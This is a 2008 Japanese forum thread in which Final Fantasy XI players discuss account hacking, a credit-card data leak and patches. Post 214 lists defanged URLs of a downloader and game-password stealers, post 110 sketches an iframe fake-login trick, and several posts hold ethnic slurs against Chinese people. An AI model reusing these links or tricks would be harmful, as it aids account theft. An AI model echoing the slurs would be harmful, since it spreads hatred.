FFスレで訊かれたが、携帯は・・大丈夫だよな?w

100 :既にその名前は使われています:2008/04/04(金) 03:08:39.77 ID:t9pk/wiR
915 名前:(^ー^*)ノ〜さん[sage] 投稿日:08/04/04 01:35 ID:IA9S36kh0
ttp://www.soundhouse.co.jp/shop/News.asp?NewsNo=1555
ttp://life9.2ch.net/test/read.cgi/credit/1207190877
ttp://namidame.2ch.net/test/read.cgi/news/1207222837

サウンドハウスから情報流出、クレカ番号やメルアドなど個人情報が漏れた
漏れた先は中国人RMT業者らしく、被害者は癌からの請求があった模様
ここでクレカ使って無くても、WEB通販使ったことある人は
他のサイトでも同じアド、パス使ってる場合は今すぐ変更しておいた方がいい

ここの通販クレジットで何度も使用してる上に殆どの通販同じメルアドPASS使ってて
その上ROプレイヤーの俺涙目
----

FFにも飛び火している可能性があるな。

101 :既にその名前は使われています:2008/04/04(金) 03:17:51.40 ID:hOpDLR6p
まったくこええな(´・ω・`)
クレカ使いの俺は恐ろしい

102 :既にその名前は使われています:2008/04/04(金) 04:53:45.26 ID:35tLGtHC
>>89
前にもそれ書いた人だと思うけど
俺は同じ時期にGMに同じ質問したが
「新たな救済方針が適用された時、既存の被害者は対象外」って言われた。
で、その書き込み見て3月の上旬くらいに違うGMに聞いたら
「誤解を招くような言い方をしたみたいで申し訳ない、現状じゃ適用されるか
どうかは言い切れない」と言ってたよ

103 :既にその名前は使われています:2008/04/04(金) 05:23:34.39 ID:o2ZoAxrW
>>100
他人のクレカを登録されたのに支払いはされてない被害者の人が居たけど
この手口で奪ったクレカ番号だったんだな…

104 :既にその名前は使われています:2008/04/04(金) 07:12:47.32 ID:EbLHlq2f
>>97
空気読むのはおまいらの方。13億人が皆クラッカーと
その協力者、みたいな妄想を書いてるのはおまいらだけ

105 :既にその名前は使われています:2008/04/04(金) 07:25:15.94 ID:UMpjGydf
>>104
誰もそんな話してないんだが

106 :既にその名前は使われています:2008/04/04(金) 09:32:29.76 ID:NEzcPzl6
>>91 スルー気味だけどよくみたらすげーヤバいじゃん。
・個人のブログだけじゃなくてサービスのトップページが書き換えられ放題
 (=システムそのものに穴があることが明白)
・Basic認証を装ってIDとパスを入力させられているユーザー多数
 (=パスを盗んだ後の個人のブログも書き換え放題)

FF関係ではあんまり見かけないけどブログ民のURLも踏めないな。

107 :既にその名前は使われています:2008/04/04(金) 09:35:10.22 ID:KFdr3cIM
>>91
スレ見てるとFFとは関係なさそうなブログが被害に合ってるみたいだね。
FC2以外の普通のブログとかは普通に読んでたからちょっとビビった。

108 :既にその名前は使われています:2008/04/04(金) 09:45:45.43 ID:3cRP6CMu
http://www.itmedia.co.jp/news/articles/0804/04/news025.html

やっとリアルプレイヤー穴ふさいだみたいね

109 :既にその名前は使われています:2008/04/04(金) 10:45:05.11 ID:no+Pon68
保守

Microsoft Office もパッチ当てるですよ
最近のワームはこの辺のバグも突いてるですよ

110 :既にその名前は使われています:2008/04/04(金) 11:09:10.49 ID:NjG+GX7i
ブログ民ひどいな
iframeでBASIC認証しかけておけば
パスワード入力してくれてうまうまかよ^^;

111 :既にその名前は使われています:2008/04/04(金) 11:37:02.68 ID:kkWyJJNm
>>108
たぶん既出

112 :既にその名前は使われています:2008/04/04(金) 11:52:17.53 ID:5YsKmYyG
ほかの大穴が放置されてるのでRealPlayerは最新版の11.0.2であっても
アンインストール推奨。
プレイヤーのセキュリティ情報をアナウンスしない企業姿勢もマイナス。

113 :既にその名前は使われています:2008/04/04(金) 12:02:14.42 ID:kkWyJJNm
>>105
自演とか言ってるおめでたい奴のことだろ

114 :既にその名前は使われています:2008/04/04(金) 12:02:28.75 ID:BOuDvnT4
とりあえず 
セキュアに自信ない人はネットでクレカ使うな。 
の時代に突入したようですね。 

FFも、webマネー払いに変えておこうぜ 



115 :既にその名前は使われています:2008/04/04(金) 12:07:01.70 ID:kkWyJJNm
>>112
何かあったっけ?
年末年始の穴は11.0.1(日本語版はなかった)で、
先月の穴は中旬の11.0.2で塞いだと思う。

ま、バージョンアップの案内もしないのはさすが
「バッドウェア」認定(笑)、入れないにこしたことはないね。

116 :既にその名前は使われています:2008/04/04(金) 12:12:47.25 ID:BOuDvnT4
支払い方法の変更の仕方 

解約する。 
月末まで解約のままにしておく。
月末の末日決算が終わるまで待つ。 
翌月の起算日時過ぎたら、先にPOLから支払い変更で、webマネーに支払い方法を切り替える 
その後、アカウント復活 

手順の後先が面倒だが、こうしないと変えられない。

117 :既にその名前は使われています:2008/04/04(金) 12:16:01.48 ID:X+fcmNg+
あれ、しばらく前にクレカからwebマネーに変更できるようになったんじゃなかった?

118 :既にその名前は使われています:2008/04/04(金) 12:16:36.46 ID:eU9BNo0q
>>114
>FFも、webマネー払いに変えておこうぜ
え?FFXIはクレカだと危ない?
一応自衛はここで推進してる事を全部していて(現在各スキャン結果も0 byカスペ)
個人情報画面を確認したところクレカのパスワードは「************○○○○」(○の部分数字)となってて
数字全部は表示されず、一応安心かと思っていたんだけど…。



119 :既にその名前は使われています:2008/04/04(金) 12:20:41.43 ID:cPCHMA9f
>>116
今回の件で定期的にパス変えてるんだけど、支払い方法変更の欄もあったはず

120 :既にその名前は使われています:2008/04/04(金) 12:30:19.84 ID:5YsKmYyG
>>115
年末年始のがCVE-2008-0098かな。これはまだふさがっていないみたい。

11.0.2は遅くとも3月24日にはダウンロードできたんだけど、そのとき
古い11でアップデートの確認をしても11.0.2が出てこなかった。もうね、
流石は「バッドウェア」だと思いましたよw

121 :既にその名前は使われています:2008/04/04(金) 12:36:55.86 ID:X+fcmNg+
>>118
クレカ番号を入れ直さなくても、POLIDとパスで鯖移動とかの有料サービスを
利用できるからあぶない、って意味じゃね?

122 :既にその名前は使われています:2008/04/04(金) 12:46:20.30 ID:1G+PPU8K
そういや、垢ハクでパクられたアイテムの保障されたって話はボチボチ聞くけど
鯖移動させられた時の発生した料金の保障があったかどうかまでは聞かないよね
まあこっちは、クレカ会社の方の話になるのかな

123 :既にその名前は使われています:2008/04/04(金) 12:49:02.45 ID:eU9BNo0q
>>121
素早いレスサンクス!
なるほど。クレカを他で悪用(ネットショッピング等)できるって訳じゃないよね。
まぁそこまでできちゃてたらもっと大騒ぎになってるか…。


124 :既にその名前は使われています:2008/04/04(金) 12:57:25.21 ID:1G+PPU8K
>>123
>>100あたりを見ると、あながちそうなりかねない気もする
特に、垢ハクされるようなPCに脆弱さのある人は、クレカ情報を盗まれる可能性も大


125 :既にその名前は使われています:2008/04/04(金) 13:06:09.00 ID:O3AYI1bF
何か最近カーソルが「自然」に移動するんだけど(例えばカンパ・エリアタゲるとピョンと他に移動する等)
今回のとは無関係(ハード問題?)ですよね?

126 :既にその名前は使われています:2008/04/04(金) 13:08:33.86 ID:kkWyJJNm
>>125
アカハックは関係ないだろうね

127 :既にその名前は使われています:2008/04/04(金) 13:22:00.95 ID:kaWf04XL
環境もかかないでこんな症状でたと言われてもエスパーじゃないからわからんよ。

128 :既にその名前は使われています:2008/04/04(金) 13:28:06.18 ID:o2ZoAxrW
>>125
マウスポインタ

129 :既にその名前は使われています:2008/04/04(金) 13:32:49.37 ID:no+Pon68
>125

ウィンドウモードでプレイ中マウスカーソルが
FFの画面内にあると良く発生する
マウスカーソルをFFの窓外に移動orマウス抜く
漏れはこれで解決した。
垢ハックとは関係ないぞw

130 :125:2008/04/04(金) 13:37:10.44 ID:O3AYI1bF
CPU】 AthlonX2 5600
【Mem】 3G
【M/B】 ASUS M2N-SLI Deluxe
【VGA】 ASUS EAX 1950PRO/HTDP/256
【driver】 カタ8.3
【DirectX】 最新
【Sound】 オンボ
【OS】 VISTA SP1

上記の構成す。なんかスレ違いだったぽですが「用」は無関係て事すね。

仕事で使用するPCシステムが不具合時業者が外からの「遠隔操作」で直す作業をみていたのでつい・・・・


131 :既にその名前は使われています:2008/04/04(金) 14:38:45.65 ID:tTKCd/QC
>>130
肝心なマウスについてかかれてないが
オプティカルマウスならマウスパッドの汚れ
ボールならマウス自体の汚れで勝手に動くことはある

何れにせよハックとは関係ない
何でもかんでも聞きゃいいってもんじゃねーだろ

132 :既にその名前は使われています:2008/04/04(金) 14:39:02.72 ID:R09oeFrC
もうインターネットから3馬鹿国家を隔離するしかないな。
そうすりゃ以前の状態に戻る。


133 :既にその名前は使われています:2008/04/04(金) 15:08:52.34 ID:zWm2Gnq2
細かいことは判らんがやっぱり中国からアクセスされることが一番の問題か?

ゲームキャラ乗っ取り容疑 少年4人書類送検
ttp://www.asahi.com/national/update/0402/NGY200804020005.html
ネット上で入手した個人情報などをもとに利用者になりすまして不正にアクセスした疑い。


あとはカジュアルなハッキング

「手編みの手袋」で検索してウイルス感染も、F-Secureがサイトの脅威警告
ttp://internet.watch.impress.co.jp/cda/news/2008/04/04/19088.html
Googleの検索結果に表示されるように、多数の単語を羅列したWebページを作成して、
アクセスをひたすら待つ手口もあるという。ユーザーはこの場合、
「手編みの手袋」といった無害な用語の検索結果をクリックしても、
マルウェアに感染する可能性があるとしている。

134 :既にその名前は使われています:2008/04/04(金) 15:19:20.05 ID:xRuVRxrT
日本にきてまじめに働いてる出稼ぎ中国人にセクハラ、パワハラしたり、10時間残業させたりでアカハックしたくもなるんじゃないw?
中国人のせいにして模倣犯してる日本人もおおいみたいだしw

135 :既にその名前は使われています:2008/04/04(金) 15:24:05.12 ID:JUdKwKxy
カスペやったあとヤフーや楽天などログイン状態だったのがログアウトになってたんだけどウイルスと関係ある?
そのあとログインは問題なくできたんだけど

136 :既にその名前は使われています:2008/04/04(金) 15:26:19.18 ID:5YsKmYyG
Cookie消したんでないの?

137 :既にその名前は使われています:2008/04/04(金) 15:30:33.57 ID:lNamtvW7
だから「俺ニホンゴ出来るんだぜ」ってキチガイ中華>>134まじどっか行けって。そんな事文化的に今の日本人しないって。

そもそも、そんな発想するの中華だけだって。

138 :既にその名前は使われています:2008/04/04(金) 15:33:03.59 ID:xRuVRxrT
業者=中国人なわけないだろw 日本人が元じめで中華雇ってやらせてるw

139 :既にその名前は使われています:2008/04/04(金) 15:33:20.80 ID:JUdKwKxy
>>136
ありがとう
カスペやっただけでクッキーとかは何もしてないんだけどな

140 :既にその名前は使われています:2008/04/04(金) 15:40:53.40 ID:9a/rc8Cy
犬と支那人は出入り禁止

141 :既にその名前は使われています:2008/04/04(金) 15:42:14.72 ID:B2m3+3aA
http://internet.watch.impress.co.jp/cda/news/2008/04/04/19090.html
月例パッチは4/9らしい。Windows6件、Office2件。忘れずに〜

142 :既にその名前は使われています:2008/04/04(金) 15:46:52.57 ID:xRuVRxrT
RMT業者も最近大掛りになってきて、日本人が経営し、ゴールドファーマーは賃金の安い国で雇うという悪質なものが増えている .

業者 FF11 日本人 中国人 雇う  でグーグルしてみろwいっぱいでてくるぞww

143 :既にその名前は使われています:2008/04/04(金) 15:48:15.32 ID:5YsKmYyG
>>139
ふむ。なんでだろ。取りあえずウイルスは関係ないと思います。

>>141
もうそんな時期だね。月例パッチは毎月第2火曜の翌日。
MS公式の事前通知はこちら。
マイクロソフト セキュリティ情報の事前通知 - 2008 年 4 月
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-apr.mspx

144 :既にその名前は使われています:2008/04/04(金) 16:16:35.53 ID:kkWyJJNm
>>142
それがどうした。アカウントハックは違法だが
仲介するだけなら違法でもなんでもねーのよ。
ヤフオクで拳銃売ろうが買おうが
ハクられたアカウント売ろうが買おうが
ヤフーに罪は及ばない。

145 :既にその名前は使われています:2008/04/04(金) 16:20:58.15 ID:xRuVRxrT
JPのタチの悪いところは外人業者を装ってること。あと、中華業者に金稼ぎの情報与えてるのは、ほとんどが日本人

146 :既にその名前は使われています:2008/04/04(金) 16:24:43.03 ID:R09oeFrC
>>ID:xRuVRxrT
はいはい、悪いのは全部日本人ですよね^^


147 :既にその名前は使われています:2008/04/04(金) 16:25:38.26 ID:B2m3+3aA
>>144
落ち着いてレスつけてる相手の全書き込み見てみるんだ。
レス付ける価値がある奴じゃないってことが判る筈だ。
以後スルーしてくれ。

148 :既にその名前は使われています:2008/04/04(金) 16:26:21.72 ID:xr2A118o
RMT倫理委員会(笑)の連中は死ねってことでいいな。

149 :既にその名前は使われています:2008/04/04(金) 16:28:31.40 ID:b1G2ljc0
いきなり回線落ちしてログインしてキャラ洗濯したらほきのキャラクターがろろぐいんしていますとか出た
やばい?

150 :既にその名前は使われています:2008/04/04(金) 16:28:43.93 ID:xRuVRxrT
頭脳=日本人 安い人件費=中国人 かなww
ヤフオクとかでアカ売りしてる奴の今まで何を売買したかみると好みとかももろ日本人だしなw

151 :既にその名前は使われています:2008/04/04(金) 16:30:26.46 ID:kkWyJJNm
>>148
RMTに倫理とか言う時点で終わってるよな。
ttp://www.4gamer.net/specials/060426_rmt/060426_rmt_001.shtml
軍需産業が平和を語るみたいな。

152 :既にその名前は使われています:2008/04/04(金) 16:41:32.73 ID:UMpjGydf
それ日本人やない!
朝鮮人やがな

153 :既にその名前は使われています:2008/04/04(金) 16:42:23.55 ID:RUWWk3kH
>>149
単なる回線切断でも再ログインに少し間を置かないとそう出てくる。
てか、FFやってるなら大概知ってそうだけど。

154 :既にその名前は使われています:2008/04/04(金) 17:10:52.13 ID:o2ZoAxrW
>>149
POLにログインできてたら大丈夫だよ
それは正常にログアウトできずに通信が途絶えて一定時間がたつまで
鯖にキャラが残ってるときに出るメッセージ。
他人の回線落ちで赤マーク出したままなかなかキャラが消えないってのがあるでしょ
あの状態になってるだけだから、別キャラで入るか時間経過まで待てばよろし

155 :既にその名前は使われています:2008/04/04(金) 17:21:11.26 ID:R09oeFrC
ゲームですらこの有様、中国をネットから遮断しろw

●● RMT業者の垢ハックが多発している件17 ●●
http://live27.2ch.net/test/read.cgi/ogame/1207140535/


156 :既にその名前は使われています:2008/04/04(金) 17:21:34.79 ID:R09oeFrC
誤爆すまん

157 :既にその名前は使われています:2008/04/04(金) 17:36:28.57 ID:EbLHlq2f
>>156
嫌でなければ誤爆先教えて

158 :既にその名前は使われています:2008/04/04(金) 18:47:36.76 ID:42HASB8v
いずれにせよ中国はRMTビジネスを中国政府自ら推奨してるし
ネットワーク犯罪にものすごく甘くて世界的に非難されている
そして犯罪を指摘されてもすっとぼけるタチの悪さ
この3つは紛れもない事実

159 :既にその名前は使われています:2008/04/04(金) 19:05:44.41 ID:E6SeBkkY
なぜかウィンドウアップデートが出来ない
アップデートのページに行って更新が見つかりましたって出て
それをインストールしようとしても失敗する・・・
OSはXP、ノートPC買った時にそのまま入ってた奴だから割れとかじゃないはず

160 :既にその名前は使われています:2008/04/04(金) 19:11:32.53 ID:kkWyJJNm
>>159
アカハック関係ない(スパイウェア等の仕業なら
そもそもWindowsUpdateに繋がらない)ので
Windows板のUpdate失敗スレなどで。

161 :既にその名前は使われています:2008/04/04(金) 19:12:04.36 ID:o2ZoAxrW
>>159
まず失敗したファイルの名称でぐぐってみ。KB〜ってやつ。
教えてgooかYahoo!知恵袋とかで似たような質問がかかると思う。
多分他のソフトとかを入れてないとインスコできないやつだ

162 :既にその名前は使われています:2008/04/04(金) 20:14:37.70 ID:kaWf04XL
そげな時は1個ずつインスコするとか試すべし。

163 :既にその名前は使われています:2008/04/04(金) 20:15:32.79 ID:AliBw2EW
カスペ、spybot、Ad-Awareとチェックしたんだけど何も見つからない
逆に心配になってきた。

164 :既にその名前は使われています:2008/04/04(金) 20:53:59.26 ID:R2viesRz
またやってきましたね。恐怖の週末がw

165 :既にその名前は使われています:2008/04/04(金) 21:30:46.89 ID:AGFEnxOr
殴子さんとこのサイト見ると、FC2から引越ししたら、すぐにそこのアドレスを
再利用して、罠サイトつけれるって話じゃないですか。もうね(ry

166 :既にその名前は使われています:2008/04/04(金) 22:42:50.36 ID:wzeDFu9W
ほしゅ

167 :既にその名前は使われています:2008/04/04(金) 22:58:04.59 ID:3mxVWcJ4
今用語辞典見られない?

168 :既にその名前は使われています:2008/04/04(金) 22:58:16.80 ID:E6SeBkkY
>>160 >>161 >>162
ありがとう!解決しますた
Framework3.0ってのが入ってなかったのが原因だったみたい

169 :既にその名前は使われています:2008/04/04(金) 23:08:35.87 ID:0maNjmf8
>>167
見れるぞ?

170 :既にその名前は使われています:2008/04/04(金) 23:25:28.65 ID:Z6J0nA8r
RealPlayerのActiveXの脆弱性を悪用する攻撃が出回る、Symantecが警告
http://internet.watch.impress.co.jp/cda/news/2008/04/04/19102.html

171 :既にその名前は使われています:2008/04/04(金) 23:30:40.35 ID:rXxQfLdM
さっさと廃人の垢ハックして高額品激安バザー( ^ω^)たのむ!

172 :既にその名前は使われています:2008/04/04(金) 23:36:46.87 ID:wzeDFu9W
>>171
いかにもリディルスレとかDシャポースレにいそうだと思ったら本当に居て笑った

173 :既にその名前は使われています:2008/04/04(金) 23:37:01.20 ID:3mxVWcJ4
>>169
トップ以外も普通に?


174 :既にその名前は使われています:2008/04/05(土) 00:05:42.55 ID:dLpY2pqz
自分169じゃないが『FF11用語辞典 ~ ウィンダスの仲間たち版』でいいんだよな?
検索が出来ないな。でも索引やカテゴリー一覧からは記事が見れる。

175 :既にその名前は使われています:2008/04/05(土) 00:18:31.07 ID:k496oMRj
さっきまでは繋がらなかったけど、今は見れる

176 :既にその名前は使われています:2008/04/05(土) 01:53:10.77 ID:DHFL6R9K
age

177 :既にその名前は使われています:2008/04/05(土) 02:01:58.22 ID:YurEnad2
中国人をなんとかして根絶やしにできんもんかね

178 :既にその名前は使われています:2008/04/05(土) 02:48:29.42 ID:qisIVQOe
こんな対応してくれると鯖スレであったんだけど、これはマジ?
だとしたら、ある程度の予防は張れるのかなー


120 名前:既にその名前は使われています[sage] 投稿日:2008/04/05(土) 02:38:35.14 ID:LhYqlbSP
実際はサポセン(サポートセンターの略なw)に電話がいい(ことになってるw)
しかし、時間帯が日中なのと、繋がりにくいのが問題
繋がっても結局はサポセンからGMへ引き繋がれるのは有名だね^^
サポセン繋がらない場合は、別垢つくってGMコール(これも問題になって有名ですね)
金払うことに問題あるだろってことで、先日不特定多数のGMコールで一時的に停止することになる
不特定多数ってのは公式では隠してて、担当GMが間違いないと判断すればいいとなったのが真相
で、後日に本人確認できれば問題ないだろうという流れ

裏技は、フレにGMコールしてもらい、自分の身分を証明するのが良い
携帯とかでフレに伝えるのがいいですね^^

179 :既にその名前は使われています:2008/04/05(土) 05:12:36.00 ID:BuIVKNFC
59.151.50.51からのアクセスをPG2がブロックした
何だこれ(((゚Д゚;)))

180 :既にその名前は使われています:2008/04/05(土) 05:16:53.50 ID:PmfP0WAm
>>179
aguseで調べてみた。火狐のダウンロードサイトを装ったサイトじゃねぇの?
場所はアメリカなんだが・・・・・連絡先が中国ってw

181 :既にその名前は使われています:2008/04/05(土) 05:35:21.67 ID:BuIVKNFC
>180
さっきaguseで調べた時は場所が北京だった・・・怪しすぎるよコエー
何だよどうなってんだよ答えてくれよウィルスバスター。゚(゚´Д`゚)゚。
バスターたよりねーからカスペのオンラインスキャンやろうと思ったら
エラー出て失敗するし・・・
>エラー、カスペルスキー オンラインスキャナ ActiveX コントロールのロードに失敗しまた
しまたって何だよしまたって!
もうどうすればいいんだorz

182 :既にその名前は使われています:2008/04/05(土) 05:49:19.36 ID:PLAOpOIW
>>179
前に、気付いて調べてみたけど、DNSサーバによって、

 www.mozilla.com → 59.151.50.31 (1社のみ確認)
 www.mozilla.com → 63.245.209.10 (or63.245.209.xxとか)

になるところがある。
ブラウザーで、[59.151.50.31]にアクセスしても、数回リダイレクトされて
最終的に[63.245.209.10]のページが表示される。
プロバイダ数社のDNSで調べたけど、[59.151.50.31]になるのは、
1社(B社)だけだった。
B社だけ、DNSの情報が古いのかもしれんし、業者にハックされてるのかは分からん。

ちなみに、B社のDNSに、wwwなしで問い合わせると、[63.245.209.10]を返す。
mozilla.com → 63.245.209.10 (B社)
[59.151.50.31]は、FireFoxの昔のIPかもしれんが、原因が分からんの
うちは、ブロックままにしてる。
英語のFireFoxサイトだから、ブロックしてても支障はないかと。

183 :既にその名前は使われています:2008/04/05(土) 05:58:30.06 ID:BuIVKNFC
>182
なるほど。ありがとう!ちょっとパニックになってたけど落ち着いた。
ブロックは外さないで念のためカスペもかけておくよ。

184 :既にその名前は使われています:2008/04/05(土) 06:36:03.40 ID:PLAOpOIW
>>183
>>182 は、自分のにわか知識で調べた結果だから、あくまで参考程度に。
もっと、詳しい人が原因を特定してくれると自分も助かるかもw

185 :既にその名前は使われています:2008/04/05(土) 06:40:16.58 ID:+elzJTyP
>>165
FC2は鯖を選べないから、
第三者がまったく同じアドレスを取得できる確率は相当低い。
ただ、鯖名が違うだけのそっくりなアドレスなら誰でも簡単に取れる。
本物が引越ししてようとしてなかろうと。

186 :既にその名前は使われています:2008/04/05(土) 06:46:54.36 ID:1+T4x1Nv
手打ちパスでログインしようとしたら「パスワードが違います」
メチャクチャドキッとした。ただ間違えただけだけど
心臓が止まったわ



187 :182:2008/04/05(土) 06:56:20.12 ID:PLAOpOIW
最後3行目から、文章がおかしかったので訂正でOrz
→ [59.151.50.31]は、FireFoxの昔のIPかもしれんが、原因が分からんの[で]
→ うちは、ブロック[した]ままにしてる。

>>186
楽しそうでなによりw

188 :既にその名前は使われています:2008/04/05(土) 07:17:16.06 ID:KpNmfhC8
> FireFoxは通常はIEエンジンを使用しているので
> そのままではIEと同じ挙動です。

【えっ?】

189 :既にその名前は使われています:2008/04/05(土) 07:28:40.06 ID:BuIVKNFC
>165 >185
FC2ブログは一度誰かが取得したのと同じIDは二度と使えなかったはずだよ。
別のアカでブログ作り直そうとして困った覚えがw

190 :既にその名前は使われています:2008/04/05(土) 08:10:29.62 ID:aAIjaNpY
>>188
通常はGeckoですよ。

191 :既にその名前は使われています:2008/04/05(土) 10:31:10.29 ID:DHFL6R9K
あげ

192 :既にその名前は使われています:2008/04/05(土) 10:52:00.01 ID:56r+qN3p
>>188
他のブラウザと混同してるな

193 :既にその名前は使われています:2008/04/05(土) 10:56:06.92 ID:k5/BcwVj
>>188
スレイプニルあたりと混同してる?

194 :既にその名前は使われています:2008/04/05(土) 12:35:26.07 ID:DHFL6R9K
age

195 :既にその名前は使われています:2008/04/05(土) 12:44:55.70 ID:FIpIPY0Q
>188は引用してるだけだr

・・・あれ?このスレでこんなこと言ってるの>188が最初じゃね?
どっかのリンク先に書いてあるんか?

196 :既にその名前は使われています:2008/04/05(土) 13:10:39.18 ID:lFz8+acd
http://www.cybersafety.go.jp/nwqa/CaseServlet?hidBackUrl=TopPageServlet&hidCaseId=0000000128&hidCaseTitle=オンラインゲームの中のお金やアイテムがなくなっている

197 :既にその名前は使われています:2008/04/05(土) 13:14:08.16 ID:uQW0/HaN
組織名
警察庁生活安全局情報技術犯罪対策課

(・д・)

198 :既にその名前は使われています:2008/04/05(土) 14:28:35.52 ID:TxKeJU4q
エクレアアイテム救済で、潜在武器× クエ取得系は、オファーしていない事が条件 救済待ちの方要注意

199 :既にその名前は使われています:2008/04/05(土) 15:01:46.03 ID:4rMMG1ch
そもそもFireFoxなるブラウザは存在しない訳だが。

200 :既にその名前は使われています:2008/04/05(土) 15:07:45.39 ID:Enl7d3Fi
>>199
IEも都市伝説だもんな

201 :既にその名前は使われています:2008/04/05(土) 16:03:58.30 ID:CwIcQ/G5
ソフトウェア板のFirefoxスレからコピペ

Firefox のスペルは? 短縮形は?
ttp://www.mozilla-japan.org/support/firefox/faq#spell-abbreviate
Firefox のスペルは F-i-r-e-f-o-x です。最初の文字だけが大文字になります
(例えば、FireFox や FireFOX、FIRE FOX など、
多くの人がそうだと思い込んでいるものはすべて間違いです)。
好ましい短縮形は「Fx」か「fx」です。

名称の変遷 Phoenix→Firebird→Firefox
レッサーパンダとは関係無いと主張する人は
キツネとも関係無いことを自覚すべきです。
火狐と呼ぶのは在日を含む中国人です。

× キツネ(イヌ科)
○ レッサーパンダ(レッサーパンダ科。近いのはアライグマ科)

202 :既にその名前は使われています:2008/04/05(土) 17:09:35.23 ID:Enl7d3Fi
>>201
コピペするほどの内容でもねえな

203 :既にその名前は使われています:2008/04/05(土) 17:23:10.27 ID:CwIcQ/G5
>>199 をわかっていない君のためなんだよ

204 :既にその名前は使われています:2008/04/05(土) 17:29:49.01 ID:sdHOjbq/
呼び名なんぞどうでもいいわカス野朗

205 :既にその名前は使われています:2008/04/05(土) 17:34:27.16 ID:CwIcQ/G5
神聖なるFirefoxの御名を違える愚劣な邪教徒は
IEを使っているがよい

206 :既にその名前は使われています:2008/04/05(土) 17:41:50.75 ID:Enl7d3Fi
>>205
新手のFirefox叩きか?
まあそうじゃないにしてもこれ以上はスレチ

207 :既にその名前は使われています:2008/04/05(土) 18:11:49.39 ID:tlUPIu7Z
名前:おちゃめ
IPアドレス:222.78.80.170
ホムペ: tp://infosueek■com/groups/ff11/

コメント内容:蛇鯖で活動中のLS「ELEOS STARS」のホームページです。
メンバー募集ですので、興味がある方はぜひ、加入してみてください。

多分いつものお馴染み163data.com.cnにこんなの貼られた。
aguse.jpで調べるとChina Chengdu …。
コメント認証制にしてて、あのわけわからん認証文字入力しないと
できないようにしてるんだが、わざわざ入力しやがったのか…?ていう。

208 :既にその名前は使われています:2008/04/05(土) 18:14:56.08 ID:Enl7d3Fi
>>207
嫌がらせ目的のJPの可能性とか

ジョブ板のリンク張りはインターリンク経由の
スパムbotだったし

209 :既にその名前は使われています:2008/04/05(土) 18:17:18.86 ID:f2C4zutU
自作した掲示板にも貼りに来るから、ロボットだけじゃないよ

210 :207:2008/04/05(土) 18:32:21.53 ID:tlUPIu7Z
貼られた時間の忍者の解析だと

国/言語中国語
REMOTE_HOST170.80.78.222.board.ly.fj.dynamic.163data.com.cn
HOSTNAME→IPアドレス変換
170.80.78.222.board.ly.fj.dynamic.163data.com.cn ⇒ 127.0.0.1

これなんで多分手動なのかもしれない。
他に163data.com.cnは最近
ff11 移転 2008/4
ff11 2008 wiki
って検索で来てたことがあった。今月移転した人とか
wikiへのリンク結構貼ってる人とか気を付けたほうがいいかもしれない(´д⊂)

211 :既にその名前は使われています:2008/04/05(土) 18:33:52.72 ID:fVNgtGsz
保守
>207
いつもの支那IPかw

↓この辺のIP使えばいいのにねw
202.32.0.131

212 :既にその名前は使われています:2008/04/05(土) 18:55:14.18 ID:DGEjENLY
某白地図サイトの掲示板に罠サイトのリンクが張られてるけど
消す気が無いのはひょっとして?

2回も食らっちまったw


213 :既にその名前は使われています:2008/04/05(土) 18:57:41.03 ID:LE/444Wd
久々に獣使いWikiに大規模爆撃



214 :既にその名前は使われています:2008/04/05(土) 19:18:13.93 ID:CwIcQ/G5
>>207
iframe www■infosueek■com/ff11diary/
→ www■infosueek■com/xin/xia.exe (ダウンローダ)
 → www■infosueek■com/xin/ff11.exe (FFXI)
 → www■infosueek■com/xin/t1.exe (リネージュ)
 → www■infosueek■com/xin/ro.exe (RO)
FC2の「ナナはちサンいち」みたいなcaptchaはあまり意味がない。

215 :既にその名前は使われています:2008/04/05(土) 19:19:52.86 ID:SfhAtf3B
もう中国にはローカルIP以外使わせるな

216 :既にその名前は使われています:2008/04/05(土) 20:39:46.59 ID:aGHg99Z0
PG2で今日の16:30くらいから約10分
ISPrime Inc [Trojan infested]ていうのブロックしてる


な・・なんじゃこりゃあぁぁぁぁぁああああぁぁあああ

217 :既にその名前は使われています:2008/04/05(土) 20:58:01.93 ID:4IIaCaAw
489 名前:名無しさん@ご利用は計画的に[sage] 投稿日:2008/04/04(金) 19:22:15
うわ、ひどい所あるんだなあ。
俺も再度。
カード会社:セゾン(VISA)
カード会社からの連絡:あり
連絡方法:電話
利用停止:向こうから勧めてくれた
カード再発行:同上
再発行手数料:無料
最終利用時期:二月頭
不正使用被害:オンラインゲーム(どうもRMT関連っぽい)で二万ほど
カード会社の不正使用に対する対応:
向こうから連絡が来て、二時間ほど前におかしな利用がありますがどうですか?
で心当たりはないと答えたら、カード止めます、再発行しますのでそれまですいませんと。

ただ向こうはサウンドハウスとは分かってなかった模様(4/3時点)。
ただ二時間ほど前の利用でしかもたった数万でかけて来てくれたので、
似たような報告があったとか何がしかの情報はあった模様。

218 :既にその名前は使われています:2008/04/05(土) 20:58:55.06 ID:4IIaCaAw
みんなも注意しろよ
RMT業者が勝手にクレカつかって引き落とそうとしてるらしい。

219 :既にその名前は使われています:2008/04/05(土) 21:03:36.18 ID:gbL69X24
そういやあきまんがRなんたらっつーゲームの利用料として不正使用喰らってた。
1万×10の10万円分。懐は痛めずに済んだけど同様の被害者多かったらしい。

220 :既にその名前は使われています:2008/04/05(土) 21:05:35.45 ID:4IIaCaAw
被害状況まとめ

流出の可能性の高いカード使用者:
1) 2007/1/1 以降の新規カード登録者
2) 次の買い物の為にカード情報を保存した人(真偽未確認 参考情報)
流出の発生:
3) 2008/03/11 以降
被害の特徴:
4) 小額を短時間の間に複数回引き落とで、計5〜7万程度の使用
(請求元は、コーエーネット、MK-STYLE等のネトゲ系サイトで
仮想紙幣を購入した例が確認)
5) 50〜80万の被害と書き込みもある(詳細不明)
今後の対処:
6) すくなくとも 1) に該当する人は、カード再発行を推奨

↓情報元スレ
http://mamono.2ch.net/test/read.cgi/newsplus/1207307849/l50

221 :既にその名前は使われています:2008/04/05(土) 21:32:32.77 ID:DvfPYcUA
ヤフオクID wpqnh021 が今週も大量出品してる
なんとかならんのかね

222 :既にその名前は使われています:2008/04/05(土) 22:04:20.06 ID:WUWF5AGY
ヴァナでも2chでもヤフオクでも今まで以上に
業者と日本人が絡んでるように感じるなぁ

223 :既にその名前は使われています:2008/04/05(土) 23:40:58.89 ID:gpQT2T7t
数多の政変で金こそが正義な国だからなんでもやるよ。
>>221
アカウントハックされた可能性の高い物を売買してますと泥棒オークションに連絡する
程度じゃない?

224 :既にその名前は使われています:2008/04/06(日) 00:04:43.40 ID:vrsV7xE0
agery

